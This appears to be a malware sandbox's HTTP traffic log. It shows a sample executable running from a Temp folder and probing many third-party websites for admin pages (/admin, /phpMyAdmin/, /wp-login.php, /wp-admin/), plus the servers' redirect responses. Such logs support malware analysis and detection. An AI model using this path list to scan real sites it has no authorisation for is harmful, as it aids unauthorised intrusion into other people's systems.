Feb 21, 2024 00:26:18.186709881 CET	313	IN	HTTP/1.1 301 Moved Permanently location: https://strategicimpact.com.au/admin vary: Accept-Encoding server: DPS/2.0.0+sha-c81b86d x-version: c81b86d x-siteid: us-east-1 set-cookie: dps_site_id=us-east-1; path=/ date: Tue, 20 Feb 2024 23:26:18 GMT keep-alive: timeout=5 transfer-encoding: chunked Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
458	192.168.2.6	52552	3.33.130.190	80	2704	C:\Users\user\AppData\Local\Temp\81F7.exe

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:18.110116959 CET	166	OUT	GET /admin HTTP/1.1 Host: cfgteam.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:18.208169937 CET	216	IN	HTTP/1.1 301 Moved Permanently Server: openresty Date: Tue, 20 Feb 2024 23:26:18 GMT Content-Type: text/plain Content-Length: 0 Connection: keep-alive Location: https://cfgteam.com/admin ETag: "65d0dd59-0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
459	192.168.2.6	52455	213.186.33.5	80	2704	C:\Users\user\AppData\Local\Temp\81F7.exe

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:18.149399996 CET	169	OUT	GET /pma/ HTTP/1.1 Host: pharmacie-vp.fr Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:18.324008942 CET	459	IN	HTTP/1.1 302 Moved Temporarily server: nginx date: Tue, 20 Feb 2024 23:26:18 GMT content-type: text/html content-length: 138 location: http://imp.ovh.net x-iplb-request-id: BF60E3DE:CCE7_D5BA2105:0050_65D5351A_63A46DE4:737F x-iplb-instance: 52193 set-cookie: SERVERID77446=200178\|ZdU1H\|ZdU1H; path=/; HttpOnly Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
460	192.168.2.6	52628	3.33.130.190	80	2704	C:\Users\user\AppData\Local\Temp\81F7.exe

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:18.166558981 CET	169	OUT	GET /admin/ HTTP/1.1 Host: blauthlaw.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:18.262814999 CET	219	IN	HTTP/1.1 301 Moved Permanently Server: openresty Date: Tue, 20 Feb 2024 23:26:18 GMT Content-Type: text/plain Content-Length: 0 Connection: keep-alive Location: https://blauthlaw.com/admin/ ETag: "65d0dd59-0"
Feb 21, 2024 00:26:18.466667891 CET	219	IN	HTTP/1.1 301 Moved Permanently Server: openresty Date: Tue, 20 Feb 2024 23:26:18 GMT Content-Type: text/plain Content-Length: 0 Connection: keep-alive Location: https://blauthlaw.com/admin/ ETag: "65d0dd59-0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
461	192.168.2.6	52692	75.2.70.75	80	2704	C:\Users\user\AppData\Local\Temp\81F7.exe

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:18.208471060 CET	170	OUT	GET /admin.php HTTP/1.1 Host: eyegage.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:18.325582027 CET	348	IN	HTTP/1.1 301 Moved Permanently Date: Tue, 20 Feb 2024 23:26:18 GMT Content-Type: text/html Content-Length: 166 Connection: keep-alive Location: https://eyegage.com/admin.php Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
462	192.168.2.6	52691	13.248.169.48	80	2704	C:\Users\user\AppData\Local\Temp\81F7.exe

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:18.208493948 CET	170	OUT	GET /admin/ HTTP/1.1 Host: acidvision.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:19.226156950 CET	220	IN	HTTP/1.1 301 Moved Permanently Server: openresty Date: Tue, 20 Feb 2024 23:26:19 GMT Content-Type: text/plain Content-Length: 0 Connection: keep-alive Location: https://acidvision.com/admin/ ETag: "65d0dd59-0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
463	192.168.2.6	52341	221.121.158.21	80	2704	C:\Users\user\AppData\Local\Temp\81F7.exe

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:18.306612015 CET	172	OUT	GET /admin/ HTTP/1.1 Host: houseguru.com.au Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:18.613466024 CET	1286	IN	HTTP/1.1 200 OK Date: Tue, 20 Feb 2024 23:26:18 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Server: imunify360-webshield/1.21 Last-Modified: Tuesday, 20-Feb-2024 23:26:18 GMT Cache-Control: private, no-store, no-cache, must-revalidate, proxy-revalidate, max-age=0, s-maxage=0 cf-edge-cache: no-cache Data Raw: 35 37 36 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 3e 0a 3c 74 69 74 6c 65 3e 4f 6e 65 20 6d 6f 6d 65 6e 74 2c 20 70 6c 65 61 73 65 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 3e 0a 62 6f 64 79 20 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 46 36 46 37 46 38 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 30 33 31 33 31 3b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 34 35 76 68 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 50 6c 65 61 73 65 20 77 61 69 74 20 77 68 69 6c 65 20 79 6f 75 72 20 72 65 71 75 65 73 74 20 69 73 20 62 65 69 6e 67 20 76 65 72 69 66 69 65 64 2e 2e 2e 3c 2f 68 31 3e 0a 3c 66 6f 72 6d 20 69 64 3d 22 77 73 69 64 63 68 6b 2d 66 6f 72 6d 22 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 3b 22 20 61 63 74 69 6f 6e 3d 22 2f 7a 30 66 37 36 61 31 64 31 34 66 64 32 31 61 38 66 62 35 66 64 30 64 30 33 65 30 66 64 63 33 64 33 63 65 64 61 65 35 32 66 22 20 6d 65 74 68 6f 64 3d 22 67 65 74 22 3e 0a 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 69 64 3d 22 77 73 69 64 63 68 6b 22 20 6e 61 6d 65 3d 22 77 73 69 64 63 68 6b 22 2f 3e 0a 3c 2f 66 6f 72 6d 3e 0a 3c 73 63 72 69 70 74 3e 0a 28 66 75 6e 63 74 69 6f 6e 28 29 7b 0a 20 20 20 20 76 61 72 20 77 65 73 74 3d 2b 28 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 5b 5d 29 2b 28 2b 21 2b 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 5b 5d 29 2b 28 2b 21 2b 5b 5d 29 29 2c 0a 20 20 20 20 20 20 20 20 65 61 73 74 3d 2b 28 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 29 Data Ascii: 576<!doctype html><html><head><meta charset="utf-8"><meta name="robots" content="noindex, nofollow"><title>One moment, please...</title><style>body { background: #F6F7F8; color: #303131; font-family: sans-serif; margin-top: 45vh; text-align: center;}</style></head><body><h1>Please wait while your request is being verified...</h1><form id="wsidchk-form" style="display:none;" action="/z0f76a1d14fd21a8fb5fd0d03e0fdc3d3cedae52f" method="get"><input type="hidden" id="wsidchk" name="wsidchk"/></form><script>(function(){ var west=+((+!+[]+!![]+!![]+!![]+!![]+!![]+!![]+!![])+(+!+[]+!![]+!![]+!![]+!![]+!![]+!![]+!![]+!![]+[])+(+!+[]+!![]+!![]+!![]+!![]+!![])+(+!+[]+!![]+!![]+!![]+[])+(+!+[])+(+!+[]+!![]+!![]+!![]+[])+(+!+[])), east=+((+!+[]+!![]+!![]+!![]+!![])+(+!+[]+!![]+!![]+!![]+[])+(+!+[]+!![]+!![]+!![]+!![]+!![]+!![])+(+!+[]+!![]+!![]+[])+(+!+[]+!![]+!![]+!![]+!![]+!![]+!![]+!![]+!![])
Feb 21, 2024 00:26:18.613482952 CET	459	IN	Data Raw: 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 29 29 2c 0a 20 20 20 20 20 20 20 20 78 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b Data Ascii: +(+!+[]+!![]+[])+(+!+[]+!![]+!![]+!![]+!![]+!![]+!![])), x=function(){try{return !!window.addEventListener;}catch(e){return !!0;} }, y=function(y,z){x() ? document.addEventListener("DOMContentLoaded",y,z) : document.attachEvent
Feb 21, 2024 00:26:18.613487005 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
464	192.168.2.6	52776	15.197.204.56	80	2704	C:\Users\user\AppData\Local\Temp\81F7.exe

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:18.306613922 CET	166	OUT	GET /admin/ HTTP/1.1 Host: att.com.au Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:18.402628899 CET	216	IN	HTTP/1.1 301 Moved Permanently Server: openresty Date: Tue, 20 Feb 2024 23:26:18 GMT Content-Type: text/plain Content-Length: 0 Connection: keep-alive Location: https://att.com.au/admin/ ETag: "65d0dd59-0"

Session ID	Source IP	Source Port	Destination IP	Destination Port
465	192.168.2.6	52930	193.70.18.144	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:18.385514975 CET	161	OUT	GET / HTTP/1.1 Host: imp.ovh.net Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:18.546350002 CET	92	IN	HTTP/1.1 301 Moved Permanently content-length: 0 location: https://www.ovh.co.uk/mail/

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
466	192.168.2.6	52918	185.39.146.199	80	2704	C:\Users\user\AppData\Local\Temp\81F7.exe

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:18.391415119 CET	172	OUT	GET /PhpMyAdmin/ HTTP/1.1 Host: markoren.no Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:18.573334932 CET	109	IN	HTTP/1.1 302 Found content-length: 0 location: https://markoren.no/PhpMyAdmin/ cache-control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
467	192.168.2.6	52672	223.29.45.10	80	2704	C:\Users\user\AppData\Local\Temp\81F7.exe

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:18.592288971 CET	188	OUT	GET /wp-login.php HTTP/1.1 Host: www.shinko-kensetsu.eei.jp Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:18.864548922 CET	459	IN	HTTP/1.1 301 Moved Permanently Date: Tue, 20 Feb 2024 23:26:18 GMT Server: Apache Location: https://shinko-kensetsu.eei.jp/wp-login.php Content-Length: 251 Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 68 69 6e 6b 6f 2d 6b 65 6e 73 65 74 73 75 2e 65 65 69 2e 6a 70 2f 77 70 2d 6c 6f 67 69 6e 2e 70 68 70 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://shinko-kensetsu.eei.jp/wp-login.php">here</a>.</p></body></html>
Feb 21, 2024 00:26:20.499227047 CET	239	OUT	GET /wp-admin/ HTTP/1.1 Host: www.shinko-kensetsu.eei.jp Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0 Referer: https://shinko-kensetsu.eei.jp/wp-login.php
Feb 21, 2024 00:26:20.772583961 CET	453	IN	HTTP/1.1 301 Moved Permanently Date: Tue, 20 Feb 2024 23:26:20 GMT Server: Apache Location: https://shinko-kensetsu.eei.jp/wp-admin/ Content-Length: 248 Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 68 69 6e 6b 6f 2d 6b 65 6e 73 65 74 73 75 2e 65 65 69 2e 6a 70 2f 77 70 2d 61 64 6d 69 6e 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://shinko-kensetsu.eei.jp/wp-admin/">here</a>.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
468	192.168.2.6	53200	144.91.85.110	80	2704	C:\Users\user\AppData\Local\Temp\81F7.exe

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:18.645525932 CET	165	OUT	GET /admin HTTP/1.1 Host: m-viper.de Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:18.824539900 CET	527	IN	HTTP/1.1 301 Moved Permanently Server: nginx Date: Tue, 20 Feb 2024 23:26:18 GMT Content-Type: text/html Content-Length: 162 Connection: keep-alive Location: https://m-viper.de/admin X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block X-Permitted-Cross-Domain-Policies: master-only Referrer-Policy: same-origin Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
469	192.168.2.6	53013	217.160.0.208	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:18.673830032 CET	180	OUT	GET /phpMyAdmin/ HTTP/1.1 Host: caspiantravel.co.uk Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:18.852530003 CET	457	IN	HTTP/1.1 302 Found Content-Type: text/html; charset=iso-8859-1 Content-Length: 220 Connection: keep-alive Keep-Alive: timeout=15 Date: Tue, 20 Feb 2024 23:26:18 GMT Server: Apache Location: http://www.caspianseagulltravels.com Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 63 61 73 70 69 61 6e 73 65 61 67 75 6c 6c 74 72 61 76 65 6c 73 2e 63 6f 6d 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="http://www.caspianseagulltravels.com">here</a>.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
470	192.168.2.6	53012	23.236.62.147	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:18.673918009 CET	167	OUT	GET /admin HTTP/1.1 Host: gmcocorp.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:18.867089033 CET	536	IN	HTTP/1.1 301 Moved Permanently Date: Tue, 20 Feb 2024 23:26:18 GMT Content-Length: 0 Connection: keep-alive location: https://www.gmcocorp.com/admin strict-transport-security: max-age=3600 Age: 1 Server-Timing: cache;desc=hit, varnish;desc=hit, dc;desc=uw2-pub-1 X-Seen-By: xIKq3IotbbLp4+7DTTMx8R9slopJdhD+WySraMrpIY8=,m0j2EEknGIVUW/liY8BLLho2HUitPUf9N0/utZJ1PDYm++C2XkuTvnlRFg2XiSDL,2d58ifebGbosy5xc+FRalrhA2yjYltN2lFcSeH10ShtZi96ZwF+bQPCNVNfbONBixEbUAfKz9//XMdY6gGTptA==,2UNV7KOq4oGjA5+PKsX47INB/bAojfHjAB2jEOw3GjkR2rxCTgaJ7/ Data Raw: Data Ascii:
Feb 21, 2024 00:26:18.867100000 CET	119	IN	Data Raw: 32 4b 78 39 6a 68 41 66 43 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 58 2d 57 69 78 2d 52 65 71 75 65 73 74 2d 49 64 3a 20 31 37 30 38 34 37 31 35 37 38 2e 37 36 33 37 33 35 35 33 34 37 33 34 31 33 32 37 32 Data Ascii: 2Kx9jhAfCCache-Control: no-cacheX-Wix-Request-Id: 1708471578.76373553473413272X-Content-Type-Options: nosniff

Session ID	Source IP	Source Port	Destination IP	Destination Port
471	192.168.2.6	53367	51.159.190.167	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:18.708048105 CET	178	OUT	GET /phpMyAdmin/ HTTP/1.1 Host: cabinet-orsika.fr Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:18.868551970 CET	367	IN	HTTP/1.1 301 Moved Permanently Server: nginx Date: Tue, 20 Feb 2024 23:26:18 GMT Content-Type: text/html Content-Length: 162 Connection: keep-alive Location: https://cabinet-orsika.fr/phpMyAdmin/ Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
472	192.168.2.6	53369	86.105.245.69	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:18.715779066 CET	171	OUT	GET /admin HTTP/1.1 Host: stylesense.co.uk Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:18.883713961 CET	386	IN	HTTP/1.1 301 Moved Permanently Server: openresty/1.21.4.1 Date: Tue, 20 Feb 2024 23:26:18 GMT Content-Type: text/html Content-Length: 175 Connection: keep-alive Location: https://stylesense.co.uk/admin Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 32 31 2e 34 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty/1.21.4.1</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
473	192.168.2.6	53434	193.70.18.144	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:18.815651894 CET	161	OUT	GET / HTTP/1.1 Host: imp.ovh.net Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:18.976504087 CET	92	IN	HTTP/1.1 301 Moved Permanently content-length: 0 location: https://www.ovh.co.uk/mail/

Session ID	Source IP	Source Port	Destination IP	Destination Port
474	192.168.2.6	53450	85.13.138.112	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:18.843951941 CET	165	OUT	GET /admin HTTP/1.1 Host: popular.de Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
